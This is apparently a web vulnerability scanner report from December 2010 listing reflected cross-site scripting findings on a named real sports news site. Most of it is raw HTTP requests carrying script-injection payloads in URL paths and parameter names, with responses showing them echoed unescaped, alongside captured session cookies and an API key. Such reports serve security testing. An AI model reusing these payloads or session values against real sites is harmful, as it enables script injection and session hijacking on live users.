GET /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html9ad97<script>alert(1)</script>903d94b6357 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:53 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html9ad97<script>alert(1)</script>903d94b6357"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ac5d<script>alert(1)</script>4474e56d302 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common5ac5d<script>alert(1)</script>4474e56d302/FB/xd_receiver.htm HTTP/1.1 Host: www.csnne.com Proxy-Connection: keep-alive Referer: http://www.facebook.com/extern/login_status.php?api_key=d4987ffea863a57509cd6a8810c955e4&extern=0&channel=http%3A%2F%2Fwww.csnne.com%2Fcommon%2FFB%2Fxd_receiver.htm&locale=en_US Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmb=262035615; __utmc=262035615; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Response
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:36:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:36:18 GMT Connection: close Content-Length: 769
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common5ac5d<script>alert(1)</script>4474e56d302/FB/xd_receiver.htm"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3f72b<script>alert(1)</script>202c08465c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/FB3f72b<script>alert(1)</script>202c08465c0/xd_receiver.htm HTTP/1.1 Host: www.csnne.com Proxy-Connection: keep-alive Referer: http://www.facebook.com/extern/login_status.php?api_key=d4987ffea863a57509cd6a8810c955e4&extern=0&channel=http%3A%2F%2Fwww.csnne.com%2Fcommon%2FFB%2Fxd_receiver.htm&locale=en_US Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmb=262035615; __utmc=262035615; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Response
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:36:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:36:19 GMT Connection: close Content-Length: 769
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/FB3f72b<script>alert(1)</script>202c08465c0/xd_receiver.htm"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8ab24<script>alert(1)</script>24ed3184db6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/FB/xd_receiver.htm8ab24<script>alert(1)</script>24ed3184db6 HTTP/1.1 Host: www.csnne.com Proxy-Connection: keep-alive Referer: http://www.facebook.com/extern/login_status.php?api_key=d4987ffea863a57509cd6a8810c955e4&extern=0&channel=http%3A%2F%2Fwww.csnne.com%2Fcommon%2FFB%2Fxd_receiver.htm&locale=en_US Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmb=262035615; __utmc=262035615; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Response
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:36:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:36:19 GMT Connection: close Content-Length: 769
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/FB/xd_receiver.htm8ab24<script>alert(1)</script>24ed3184db6"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a272<script>alert(1)</script>49eb8ac91a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common2a272<script>alert(1)</script>49eb8ac91a7/ad_count.php HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:41 GMT Content-Length: 763 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common2a272<script>alert(1)</script>49eb8ac91a7/ad_count.php"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 50617<script>alert(1)</script>a89c9152d01 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/ad_count.php50617<script>alert(1)</script>a89c9152d01 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:41 GMT Content-Length: 763 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/ad_count.php50617<script>alert(1)</script>a89c9152d01"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5f769<script>alert(1)</script>7a6f7887f8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common5f769<script>alert(1)</script>7a6f7887f8f/global_flash/player/player.php HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:43 GMT Content-Length: 781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common5f769<script>alert(1)</script>7a6f7887f8f/global_flash/player/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 60dd4<script>alert(1)</script>8d0c9768234 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash60dd4<script>alert(1)</script>8d0c9768234/player/player.php HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:43 GMT Content-Length: 781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash60dd4<script>alert(1)</script>8d0c9768234/player/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b0d06<script>alert(1)</script>267a33c228c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash/playerb0d06<script>alert(1)</script>267a33c228c/player.php HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:43 GMT Content-Length: 781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash/playerb0d06<script>alert(1)</script>267a33c228c/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f675b<script>alert(1)</script>d741c79dba7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash/player/player.phpf675b<script>alert(1)</script>d741c79dba7 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:43 GMT Content-Length: 781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash/player/player.phpf675b<script>alert(1)</script>d741c79dba7"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d7f12<script>alert(1)</script>e6b10e0cb43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/js/d7f12<script>alert(1)</script>e6b10e0cb43 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:41 GMT Content-Length: 754 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/js/d7f12<script>alert(1)</script>e6b10e0cb43"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a0e2d<script>alert(1)</script>e142e3b5e09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagesa0e2d<script>alert(1)</script>e142e3b5e09/coldhardfootballfacts HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:56 GMT Content-Length: 771 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pagesa0e2d<script>alert(1)</script>e142e3b5e09/coldhardfootballfacts"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 62897<script>alert(1)</script>af2e9b3fa8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/coldhardfootballfacts62897<script>alert(1)</script>af2e9b3fa8b HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:56 GMT Content-Length: 790 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/coldhardfootballfacts62897<script>alert(1)</script>af2e9b3fa8b"</strong> ...[SNIP]...
2.361. http://www.csnne.com/pages/coldhardfootballfacts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnne.com
Path:
/pages/coldhardfootballfacts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7820"><script>alert(1)</script>726d0aa2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/coldhardfootballfacts?d7820"><script>alert(1)</script>726d0aa2c=1 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 78225 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:55 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="d7820"><script>alert(1)</script>726d0aa2c" id = "d7820"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22592<script>alert(1)</script>ec10aac25dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages22592<script>alert(1)</script>ec10aac25dd/v3_sportsnetcentralupdate HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:55 GMT Content-Length: 775 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pages22592<script>alert(1)</script>ec10aac25dd/v3_sportsnetcentralupdate"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7042f<script>alert(1)</script>17bd18741be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/v3_sportsnetcentralupdate7042f<script>alert(1)</script>17bd18741be HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:55 GMT Content-Length: 794 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/v3_sportsnetcentralupdate7042f<script>alert(1)</script>17bd18741be"</strong> ...[SNIP]...
2.364. http://www.csnne.com/pages/v3_sportsnetcentralupdate [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnne.com
Path:
/pages/v3_sportsnetcentralupdate
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33f46"><script>alert(1)</script>d8125d0d239 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/v3_sportsnetcentralupdate?33f46"><script>alert(1)</script>d8125d0d239=1 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 56351 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:55 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="33f46"><script>alert(1)</script>d8125d0d239" id = "33f46"> ...[SNIP]...
